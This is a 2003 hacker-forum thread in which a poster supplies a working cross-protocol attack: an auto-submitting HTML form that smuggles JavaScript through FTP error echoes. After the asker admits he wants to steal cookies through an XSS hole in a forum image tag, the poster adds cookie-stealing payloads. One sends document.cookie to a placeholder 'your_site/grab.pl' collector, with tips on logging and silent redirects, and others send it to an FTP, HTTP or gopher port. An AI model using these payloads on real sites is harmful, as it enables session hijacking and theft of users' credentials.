Welcome to HDC BBS.
Thanks to K0ncept0ne for assisting in moderating the culture Forums... His dedication to HDC has been outstanding.
- Ranger
 
           HDC BBS > Software/Programming > Scripting Languages > javascript ftp? 
 
 Pages (2): « 1 [2]    Last Thread   Next Thread   
Author Thread      
 
 
  
 shellreef
PFA Junior(Pre PFA )

Registered: May 2002
Location: Yucaipa, CA
Posts: 667
  Re: javascript ftp? 

quote:
--------------------------------------------------------------------------------
Originally posted by Plexapotamus 
does anyone know how to send a file to a ftp server using javascript? 
--------------------------------------------------------------------------------


I can't think of any practical reason why you would want to do this. Automating FTP can be done using much better tools than JavaScript (see: Perl, Python, Ruby...), but nonetheless, it makes an interesting programming challenge!

(Tested on Windows XP, MSIE6) This code retreives a file using java script:


code:--------------------------------------------------------------------------------
<html>
<head>
<title></title>
</head>
<body onload=document.forms[0].submit()>
<form action="http://ftp.prz.rzeszow.pl:2121/" method=post enctype="multipart/form-data">
<textarea name=cmds>
USER anonymous
PASS guest@
PASV
MKD <b>Wait...</b><script>s=document.body.innerHTML;//
MKD ;p=s.substr(s.indexOf('Mode\040(')+6);//
MKD ;p=p.substr(0,p.indexOf(")"));i=3;while(i--){//
MKD ;p=p.replace(",",".");}p=p.replace(",",":");//
MKD ;ip=p.substr(0,p.indexOf(":"));//
MKD ;i=4;while(i--){p=p.substr(p.indexOf('.')+1);}//
MKD ;a=p.substr(d=p.indexOf(':')+1,p.indexOf(",")-d);//
MKD ;b=p.substr(p.indexOf(',')+1);port=a*256+(b*1);//
MKD ;setTimeout("location='telnet://'+ip+':'+port",1000);</script><b>Ok!</b>
RETR /pub/unix/MD5.tar.Z.asc
QUIT
</textarea>
</form>
</body>
</html>
--------------------------------------------------------------------------------


STORing is left as an exercise to the reader (the lack of legitimate anonymously uploadable FTPs makes a demonstration hard to present). This works by sending MKD commands which will return a "XXX: permission denied" error, thus causing the JavaScript to be echoed back to the browser (View Source to see this in action), which then proceeds to execute it. Basically the JS grabs the IP and port from the response to the PASV command, and connects to it using Telnet. The HTML page itself makes use of forms and the Netscape-invented ENCTYPE=multipart/form-data attribute, it lets the form data be sent as is--the FTP client will be confused by the HTTP POST and headers, but will be glad to execute the form data as FTP commands (use a sniffer such as Ethereal to see this happen). Note that the FTP server mustn't reside on port 21, because IE doesn't allow HTTP to be used with port 21. So there you have it: JavaScript FTP.

Hope this helps.

Update: Its not as hard as it seems to make this script upload. First replace RETR with STOR and a valid pathname, then all you have to do is send the file on the opened port. Either leave the location="telnet://" call the way it is and type the file manually, or make another HTTP POST form with ENCTYPE=multipart/form-data, script the automatic submission, have it send <INPUT TYPE=FILE> data. I'll put up an example if needed.


Last edited by shellreef on 03-23-2003 at 10:07 PM

Report this post to a moderator | IP: Logged
 
 03-23-2003 07:34 PM          
 
 
  
 bolid
Sr. Member (PFA)

Registered: Nov 2001
Location: llun\ved\
Posts: 1594
  ... 
Cool hack, shellreef. Just as a sidenote, IE (5 anyway) lets you use port 21 for HTTP.



Report this post to a moderator | IP: Logged
 
 03-23-2003 10:38 PM          
 
 
  
 Plexapotamus
Junior Member

Registered: Feb 2003
Location: Toronto Canada
Posts: 22
  
Ok, the question was asked, what exactly am I trying todo...

so I'll fess up... and I know this looks kinda bad, but its not, you can even check up on me if you would like...

I post on another board @ www.torontoraves.com
I am a STAFF member you can check this out by going to the forums and clicking on member list, I am #7 and in my profile you will see "TR.com staff", anywho, me and another staff member are testing the site for exploits;

one that we found allows you to write js in a [img] tag.

hence you can steal cookies, we already had this working using a second script running on a remote server... but I posed the question, do you think it would be possible to upload the cookie to a ftp without the other server side script. He said no, I said that there must be a way. Hence my search started.

I'm still not quite sure how todo it, but I take it from the post that is 2 X above mine that its is... 

Anywho, like I said, I am staff on tr.com and I'm not going to be using this information maliciously.. we were just seeing how easy it would have been todo it all...



Report this post to a moderator | IP: Logged
 
 03-24-2003 03:05 PM          
 
 
  
 shellreef
PFA Junior(Pre PFA )

Registered: May 2002
Location: Yucaipa, CA
Posts: 667
  
There is definitely a way; use the JS FTP code in my previous post, but replace RETR with STOR, replace the FTP address with your own, and fill in the USER and PASS commands. The FTP data port will be sent an HTTP request, so you'll have to pick out the HTTP headers in the uploaded file, but thats easy enough.
Example HTTP request:


code:--------------------------------------------------------------------------------
GET /pathname/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
Host: 10.0.0.2:8000
Connection: Keep-Alive
--------------------------------------------------------------------------------


This line:

code:--------------------------------------------------------------------------------
MKD ;setTimeout("location='telnet://'+ip+':'+port",1000);</script><b>Ok!</b>
--------------------------------------------------------------------------------

Can be changed to something like this:

code:--------------------------------------------------------------------------------
MKD ;setTimeout("location='http://'+ip+':'+port+'/'+document.cookie);</script>
--------------------------------------------------------------------------------


That will upload the cookie to the FTP site... but if you ask me, FTP is too much work because of the data port.

If your browser supports Gopher (newer versions of IE do not, but older ones do), change 'http://' to 'gopher://' and the cookie will be uploaded almost unmolested. Gopher is a quite clean protocol so there is no headers and whatnot. But note that you will need to add '/0' to the end of the path, this signifies the document type and if it is sent to the cookie the first character will be cut off.

Believe it or not, the easist way to upload data in such circumstances is HTTP. Take this:

code:--------------------------------------------------------------------------------
<script>
location='http://your_site/grab.pl?' + escape(document.cookie);
</script>
--------------------------------------------------------------------------------

grab.pl can be anything, all you will need to do is check your server logs and your cookie will be there. But if you want to get fancy, have grab.pl log $ENV{QUERY_STRING} to a file, and return a 302 Redirect to the browser. This will allow for the most transparency.

Hope this helps, and keep it legal.

bolid: Interesting...so cross-protocol scripting is much easier with IE 5  Mozilla blocks access to tons of ports for "security reasons". It won't let you access ports 7, 21, etc. through HTTP. Gopher on Mozilla is even more protected, the only port it will accept is 70. In summary, Mozilla is the most secure against Cross-Protocol Attacks, IE5.5 is the least, and IE6.0 is getting better.



Report this post to a moderator | IP: Logged
 
 03-25-2003 12:16 AM          
 
 
  
 All times are GMT. The time now is 08:07 PM.      
 
 
Pages (2): « 1 [2]